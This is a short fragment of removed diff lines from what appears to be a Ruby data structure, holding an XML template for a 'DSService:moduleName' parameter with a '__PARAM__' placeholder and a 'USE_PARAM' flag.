- '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
- '</params></Parameters>',
- 'USE_PARAM' => true
- }
- ],
- [